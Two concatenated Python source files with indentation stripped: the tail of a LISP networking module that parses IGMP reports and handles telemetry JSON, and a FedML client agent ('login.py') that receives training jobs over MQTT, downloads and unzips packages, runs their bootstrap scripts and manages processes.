# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check where there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR runnnig as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0:1])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
(igmp_type in igmp_types) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (record_type not in lisp_igmp_record_types):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return dictionary arraay if json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if ("type" not in tel): return(None)
if ("sub-type" not in tel): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if ("telemetry" not in lisp_json_list): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#
# lisp_mr_or_pubsub
#
# Test action for Map-Request or Map-Request with Subscribe bit set.
#
def lisp_mr_or_pubsub(action):
return(action in [LISP_SEND_MAP_REQUEST_ACTION, LISP_SEND_PUBSUB_ACTION])
#enddef
#------------------------------------------------------------------------------
|
login.py | import argparse
import json
import multiprocessing
import os
import platform
import re
import shutil
import signal
import stat
import subprocess
import time
import traceback
import urllib
import uuid
import zipfile
from os.path import expanduser
import psutil
import requests
import yaml
from fedml.cli.edge_deployment.mqtt_manager import MqttManager
from fedml.cli.edge_deployment.yaml_utils import load_yaml_config
from fedml.mlops import MLOpsMetrics
import click
class FedMLClientRunner:
def __init__(self, args, edge_id, request_json=None):
self.mqtt_mgr = None
self.client_mqtt_mgr = None
self.edge_id = edge_id
self.process = None
self.args = args
self.request_json = request_json
self.version = args.version
self.device_id = args.device_id
self.cloud_region = args.cloud_region
self.cur_dir = os.path.split(os.path.realpath(__file__))[0]
if args.current_running_dir is not None:
self.cur_dir = args.current_running_dir
self.sudo_cmd = ""
self.is_mac = False
if platform.system() == "Darwin":
self.is_mac = True
self.agent_config = None
self.fedml_data_base_package_dir = os.path.join("/", "fedml", "data")
self.fedml_data_local_package_dir = os.path.join("/", "fedml", "fedml-package", "fedml", "data")
self.fedml_data_dir = self.fedml_data_base_package_dir
self.fedml_config_dir = os.path.join("/", "fedml", "conf")
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES = {"${FEDSYS.RUN_ID}": "",
"${FEDSYS.PRIVATE_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_ID_LIST}": "",
"${FEDSYS.SYNTHETIC_DATA_URL}": "",
"${FEDSYS.IS_USING_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_NUM}": "",
"${FEDSYS.CLIENT_INDEX}": "",
"${FEDSYS.CLIENT_OBJECT_LIST}": "",
"${FEDSYS.LOG_SERVER_URL}": ""}
self.container_name = None
self.mlops_metrics = None
click.echo("Current directory of client agent: " + self.cur_dir)
@staticmethod
def generate_yaml_doc(run_config_object, yaml_file):
try:
file = open(yaml_file, 'w', encoding='utf-8')
yaml.dump(run_config_object, file)
file.close()
except Exception as e:
click.echo("Generate yaml file.")
def build_dynamic_constrain_variables(self, run_id, run_config, unzip_package_path):
data_config = run_config["data_config"]
server_edge_id_list = self.request_json["edgeids"]
local_edge_id_list = [1]
local_edge_id_list[0] = self.edge_id
is_using_local_data = 0
private_data_dir = data_config["privateLocalData"]
synthetic_data_url = data_config["syntheticDataUrl"]
edges = self.request_json["edges"]
# if private_data_dir is not None \
# and len(str(private_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
if private_data_dir is None or len(str(private_data_dir).strip(' ')) <= 0:
params_config = run_config.get("parameters", None)
private_data_dir = os.path.join(unzip_package_path, "fedml", "data")
if synthetic_data_url is None or len(str(synthetic_data_url)) <= 0:
synthetic_data_url = private_data_dir
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.RUN_ID}"] = run_id
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.PRIVATE_LOCAL_DATA}"] = private_data_dir.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_ID_LIST}"] = str(local_edge_id_list).replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.SYNTHETIC_DATA_URL}"] = synthetic_data_url.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.IS_USING_LOCAL_DATA}"] = str(is_using_local_data)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_NUM}"] = len(server_edge_id_list)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_INDEX}"] = server_edge_id_list.index(self.edge_id) + 1
client_objects = str(json.dumps(edges))
client_objects = client_objects.replace(" ", "").replace("\n", "").replace('"', '\\"')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_OBJECT_LIST}"] = client_objects
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.LOG_SERVER_URL}"] = self.agent_config["ml_ops_config"][
"LOG_SERVER_URL"]
def unzip_file(self, zip_file, unzip_file_path):
result = False
if zipfile.is_zipfile(zip_file):
with zipfile.ZipFile(zip_file, 'r') as zipf:
zipf.extractall(unzip_file_path)
result = True
return result
def retrieve_and_unzip_package(self, package_name, package_url):
package_file_no_extension = str(package_name).split('.')[0]
home_dir = expanduser("~")
local_package_path = os.path.join(home_dir, "fedml-client", "fedml_packages")
try:
os.makedirs(local_package_path)
except Exception as e:
click.echo("make dir")
local_package_file = os.path.join(local_package_path, os.path.basename(package_url))
if not os.path.exists(local_package_file):
urllib.request.urlretrieve(package_url, local_package_file)
unzip_package_path = local_package_path
try:
shutil.rmtree(os.path.join(unzip_package_path, package_file_no_extension), ignore_errors=True)
except Exception as e:
pass
self.unzip_file(local_package_file, unzip_package_path)
unzip_package_path = os.path.join(unzip_package_path, package_file_no_extension)
return unzip_package_path
def update_local_fedml_config(self, run_id, run_config):
packages_config = run_config["packages_config"]
# Copy config file from the client
unzip_package_path = self.retrieve_and_unzip_package(packages_config["linuxClient"],
packages_config["linuxClientUrl"])
fedml_local_config_file = unzip_package_path + os.path.join("/", "conf", "fedml.yaml")
# Load the above config to memory
config_from_container = load_yaml_config(fedml_local_config_file)
container_entry_file_config = config_from_container["entry_config"]
container_dynamic_args_config = config_from_container["dynamic_args"]
entry_file = container_entry_file_config["entry_file"]
conf_file = container_entry_file_config["conf_file"]
full_conf_path = os.path.join(unzip_package_path, "fedml", "config", os.path.basename(conf_file))
home_dir = expanduser("~")
fedml_package_home_dir = os.path.join(home_dir, "fedml-client")
# Dynamically build constrain variable with realtime parameters from server
self.build_dynamic_constrain_variables(run_id, run_config, fedml_package_home_dir)
# Update entry arguments value with constrain variable values with realtime parameters from server
# currently we support the following constrain variables:
# ${FEDSYS_RUN_ID}: a run id represented one entire Federated Learning flow
# ${FEDSYS_PRIVATE_LOCAL_DATA}: private local data path in the Federated Learning client
# ${FEDSYS_CLIENT_ID_LIST}: client list in one entire Federated Learning flow
# ${FEDSYS_SYNTHETIC_DATA_URL}: synthetic data url from server,
# if this value is not null, the client will download data from this URL to use it as
# federated training data set
# ${FEDSYS_IS_USING_LOCAL_DATA}: whether use private local data as federated training data set
container_dynamic_args_config["data_cache_dir"] = "${FEDSYS.PRIVATE_LOCAL_DATA}"
for constrain_variable_key, constrain_variable_value in self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES.items():
for argument_key, argument_value in container_dynamic_args_config.items():
if argument_value is not None and str(argument_value).find(constrain_variable_key) == 0:
replaced_argument_value = str(argument_value).replace(constrain_variable_key,
str(constrain_variable_value))
container_dynamic_args_config[argument_key] = replaced_argument_value
# Merge all container new config sections as new config dictionary
container_config_to_yaml = dict()
container_config_to_yaml["entry_config"] = container_entry_file_config
container_config_to_yaml["dynamic_args"] = container_dynamic_args_config
container_config_to_yaml["dynamic_args"]["config_version"] = self.args.config_version
container_dynamic_args_config["mqtt_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"mqtt_config_path"]))
container_dynamic_args_config["s3_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"s3_config_path"]))
log_file_dir = os.path.join(fedml_package_home_dir, "fedml", "logs")
try:
os.makedirs(log_file_dir)
except Exception as e:
pass
container_config_to_yaml["dynamic_args"]["log_file_dir"] = log_file_dir
# Save new config dictionary to local file
fedml_updated_config_file = os.path.join(unzip_package_path, "conf", "fedml.yaml")
FedMLClientRunner.generate_yaml_doc(container_config_to_yaml, fedml_updated_config_file)
# Build dynamic arguments and set arguments to fedml config object
self.build_dynamic_args(container_config_to_yaml, unzip_package_path)
return unzip_package_path, container_config_to_yaml
def build_dynamic_args(self, package_conf_object, base_dir):
fedml_conf_file = package_conf_object["entry_config"]["conf_file"]
print("fedml_conf_file:" + fedml_conf_file)
fedml_conf_path = os.path.join(base_dir, "fedml", "config", os.path.basename(fedml_conf_file))
fedml_conf_object = load_yaml_config(fedml_conf_path)
package_dynamic_args = package_conf_object["dynamic_args"]
fedml_conf_object["comm_args"]["mqtt_config_path"] = package_dynamic_args["mqtt_config_path"]
fedml_conf_object["comm_args"]["s3_config_path"] = package_dynamic_args["s3_config_path"]
fedml_conf_object["common_args"]["using_mlops"] = True
fedml_conf_object["train_args"]["run_id"] = package_dynamic_args["run_id"]
fedml_conf_object["train_args"]["client_id_list"] = package_dynamic_args["client_id_list"]
fedml_conf_object["train_args"]["client_num_in_total"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["train_args"]["client_num_per_round"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["device_args"]["worker_num"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["data_args"]["data_cache_dir"] = package_dynamic_args["data_cache_dir"]
fedml_conf_object["tracking_args"]["log_file_dir"] = package_dynamic_args["log_file_dir"]
fedml_conf_object["tracking_args"]["log_server_url"] = package_dynamic_args["log_server_url"]
bootstrap_script_file = fedml_conf_object["environment_args"]["bootstrap"]
bootstrap_script_path = os.path.join(base_dir, "fedml", "config", os.path.basename(bootstrap_script_file))
try:
os.makedirs(package_dynamic_args["data_cache_dir"])
except Exception as e:
pass
fedml_conf_object["dynamic_args"] = package_dynamic_args
FedMLClientRunner.generate_yaml_doc(fedml_conf_object, fedml_conf_path)
try:
bootstrap_stat = os.stat(bootstrap_script_path)
os.chmod(bootstrap_script_path, bootstrap_stat.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
os.system(bootstrap_script_path)
except Exception as e:
click.echo("Exception when executing bootstrap.sh: {}", traceback.format_exc())
def build_image_unique_id(self, run_id, run_config):
config_name = str(run_config.get("configName", "run_" + str(run_id)))
config_creater = str(run_config.get("userId", "user_" + str(run_id)))
image_unique_id = re.sub('[^a-zA-Z0-9_-]', '', str(config_name + "_" + config_creater))
image_unique_id = image_unique_id.lower()
return image_unique_id
def run(self):
click.echo("start_run: " + json.dumps(self.request_json))
run_id = self.request_json["runId"]
run_config = self.request_json["run_config"]
data_config = run_config["data_config"]
packages_config = run_config["packages_config"]
# get training params
private_local_data_dir = data_config.get("privateLocalData", "")
is_using_local_data = 0
# if private_local_data_dir is not None and len(str(private_local_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
# start a run according to the hyper-parameters
# fedml_local_data_dir = self.cur_dir + "/fedml_data/run_" + str(run_id) + "_edge_" + str(edge_id)
fedml_local_data_dir = os.path.join(self.cur_dir, "fedml_data")
fedml_local_config_dir = os.path.join(self.cur_dir, "fedml_config")
if is_using_local_data:
fedml_local_data_dir = private_local_data_dir
self.fedml_data_dir = self.fedml_data_local_package_dir
# update local config with real time parameters from server and dynamically replace variables value
unzip_package_path, fedml_config_object = self.update_local_fedml_config(run_id, run_config)
entry_file_config = fedml_config_object["entry_config"]
dynamic_args_config = fedml_config_object["dynamic_args"]
entry_file = os.path.basename(entry_file_config["entry_file"])
conf_file = entry_file_config["conf_file"]
FedMLClientRunner.cleanup_edge_learning_process()
os.chdir(os.path.join(unzip_package_path, "fedml"))
python_program = 'python'
python_version_str = os.popen("python --version").read()
if python_version_str.find("Python 3.") == -1:
python_version_str = os.popen("python3 --version").read()
if python_version_str.find("Python 3.") != -1:
python_program = 'python3'
process = subprocess.Popen([python_program, entry_file,
'--cf', conf_file, '--rank', str(dynamic_args_config["rank"])])
FedMLClientRunner.save_edge_learning_process(process.pid)
process.wait()
self.reset_devices_status(self.edge_id)
def reset_devices_status(self, edge_id):
# if self.client_mqtt_mgr is None:
# self.client_mqtt_mgr = MqttManager(
# self.agent_config["mqtt_config"]["BROKER_HOST"],
# self.agent_config["mqtt_config"]["BROKER_PORT"],
# self.agent_config["mqtt_config"]["MQTT_USER"],
# self.agent_config["mqtt_config"]["MQTT_PWD"],
# self.agent_config["mqtt_config"]["MQTT_KEEPALIVE"],
# "FLClient_Agent-Train",
# )
# mlops_logger = MLOpsMetrics()
# mlops_logger.set_messenger(self.client_mqtt_mgr)
self.mlops_metrics.report_client_training_status(edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
time.sleep(3)
def stop_run(self):
if self.process is not None:
try:
self.process.terminate()
self.process.join()
self.process = None
except Exception as e:
pass
FedMLClientRunner.cleanup_edge_learning_process()
FedMLClientRunner.cleanup_edge_run_process()
click.echo("Stop run successfully.")
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
def callback_start_train(self, topic, payload):
click.echo("callback_start_train: topic = %s, payload = %s" % (topic, payload))
# get training params
request_json = json.loads(payload)
run_id = request_json["runId"]
# Terminate previous process about starting or stopping run command
if self.process is not None:
try:
self.process.terminate()
self.process.join()
self.process = None
except Exception as e:
pass
FedMLClientRunner.cleanup_edge_run_process()
# Start cross-silo server with multi processing mode
self.request_json = request_json
self.container_name = "fedml_container_run_" + str(run_id) + "_edge_" + str(self.edge_id)
self.process = multiprocessing.Process(target=self.run)
self.process.start()
FedMLClientRunner.save_edge_run_process(self.process.pid)
#self.run()
def callback_stop_train(self, topic, payload):
click.echo("callback_stop_train: topic = %s, payload = %s" % (topic, payload))
# Notify MLOps with the stopping message
self.mlops_metrics.report_client_training_status(self.edge_id,
MqttManager.MSG_MLOPS_CLIENT_STATUS_STOPPING)
request_json = json.loads(payload)
run_id = request_json["runId"]
click.echo("Stopping run...")
click.echo("Stop run with multiprocessing.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
self.container_name = "fedml_container_run_" + str(run_id) + "_edge_" + str(self.edge_id)
multiprocessing.Process(target=self.stop_run).start()
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
def cleanup_client_with_finished_status(self):
self.stop_run()
@staticmethod
def cleanup_edge_run_process():
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-sub-process.id")
edge_process_info = load_yaml_config(edge_process_id_file)
edge_process_id = edge_process_info.get('process_id', None)
if edge_process_id is not None:
try:
edge_process = psutil.Process(edge_process_id)
for edge_sub_process in edge_process.children():
os.kill(edge_sub_process.pid, signal.SIGTERM)
if edge_process is not None:
os.kill(edge_process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
@staticmethod
def save_edge_run_process(edge_process_id):
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-sub-process.id")
yaml_object = {}
yaml_object['process_id'] = edge_process_id
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
@staticmethod
def cleanup_edge_learning_process():
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-learning-process.id")
edge_process_info = load_yaml_config(edge_process_id_file)
edge_process_id = edge_process_info.get('process_id', None)
if edge_process_id is not None:
try:
edge_process = psutil.Process(edge_process_id)
for edge_sub_process in edge_process.children():
os.kill(edge_sub_process.pid, signal.SIGTERM)
if edge_process is not None:
os.kill(edge_process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
@staticmethod
def save_edge_learning_process(edge_learning_id):
try:
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
edge_process_id_file = os.path.join(local_pkg_data_dir, "edge-learning-process.id")
yaml_object = {}
yaml_object['process_id'] = edge_learning_id
FedMLClientRunner.generate_yaml_doc(yaml_object, edge_process_id_file)
except Exception as e:
pass
def callback_client_status(self, topic, payload):
click.echo("callback_client_status: topic = %s, payload = %s" % (topic, payload))
request_json = json.loads(payload)
run_id = request_json["run_id"]
status = request_json["status"]
if status == MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED:
click.echo("Received training finished message.")
if self.process is not None:
try:
self.process.terminate()
self.process.join()
self.process = None
except Exception as e:
pass
click.echo("Stopping training client.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
self.container_name = "fedml_container_run_" + str(run_id) + "_edge_" + str(self.edge_id)
multiprocessing.Process(target=self.cleanup_client_with_finished_status).start()
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
@staticmethod
def get_device_id():
if "nt" in os.name:
device_id = subprocess.Popen("dmidecode.exe -s system-uuid".split())
elif "posix" in os.name:
device_id = hex(uuid.getnode())
else:
device_id = subprocess.Popen(
"hal-get-property --udi /org/freedesktop/Hal/devices/computer --key system.hardware.uuid".split()
)
return device_id
def bind_account_and_device_id(self, url, account_id, device_id, os_name):
json_params = {"accountid": account_id, "deviceid": device_id, "type": os_name,
"gpu": "None", "processor": "", "network": ""}
if str(url).startswith("https://"):
cur_source_dir = os.path.dirname(__file__)
cert_path = os.path.join(cur_source_dir, "ssl", "open.fedml.ai_bundle.crt")
requests.session().verify = cert_path
response = requests.post(url, json=json_params, verify=True, headers={'Connection': 'close'})
else:
response = requests.post(url, json=json_params, headers={'Connection': 'close'})
status_code = response.json().get("code")
if status_code == "SUCCESS":
edge_id = response.json().get("data").get("id")
else:
return 0
return edge_id
def fetch_configs(self):
url = "https://open.fedml.ai/fedmlOpsServer/configs/fetch"
if hasattr(self.args, "config_version") and self.args.config_version is not None:
# Setup config url based on selected version.
if self.args.config_version == "release":
url = "https://open.fedml.ai/fedmlOpsServer/configs/fetch"
elif self.args.config_version == "test":
url = "http://open-test.fedml.ai/fedmlOpsServer/configs/fetch"
elif self.args.config_version == "dev":
url = "http://open-dev.fedml.ai/fedmlOpsServer/configs/fetch"
elif self.args.config_version == "local":
url = "http://localhost:9000/fedmlOpsServer/configs/fetch"
json_params = {"config_name": ["mqtt_config", "s3_config", "ml_ops_config", "docker_config"]}
if str(url).startswith("https://"):
cur_source_dir = os.path.dirname(__file__)
cert_path = os.path.join(cur_source_dir, "ssl", "open.fedml.ai_bundle.crt")
requests.session().verify = cert_path
response = requests.post(url, json=json_params, verify=True, headers={'Connection': 'close'})
else:
response = requests.post(url, json=json_params, headers={'Connection': 'close'})
status_code = response.json().get("code")
if status_code == "SUCCESS":
mqtt_config = response.json().get("data").get("mqtt_config")
s3_config = response.json().get("data").get("s3_config")
mlops_config = response.json().get("data").get("ml_ops_config")
docker_config = response.json().get("data").get("docker_config")
else:
raise Exception("failed to fetch device configurations!")
return mqtt_config, s3_config, mlops_config, docker_config
def setup_mqtt_connection(self, service_config):
# Setup MQTT connection
self.mqtt_mgr = MqttManager(
service_config["mqtt_config"]["BROKER_HOST"],
service_config["mqtt_config"]["BROKER_PORT"],
service_config["mqtt_config"]["MQTT_USER"],
service_config["mqtt_config"]["MQTT_PWD"],
service_config["mqtt_config"]["MQTT_KEEPALIVE"],
self.edge_id,
)
self.mlops_metrics = MLOpsMetrics()
self.mlops_metrics.set_messenger(self.mqtt_mgr)
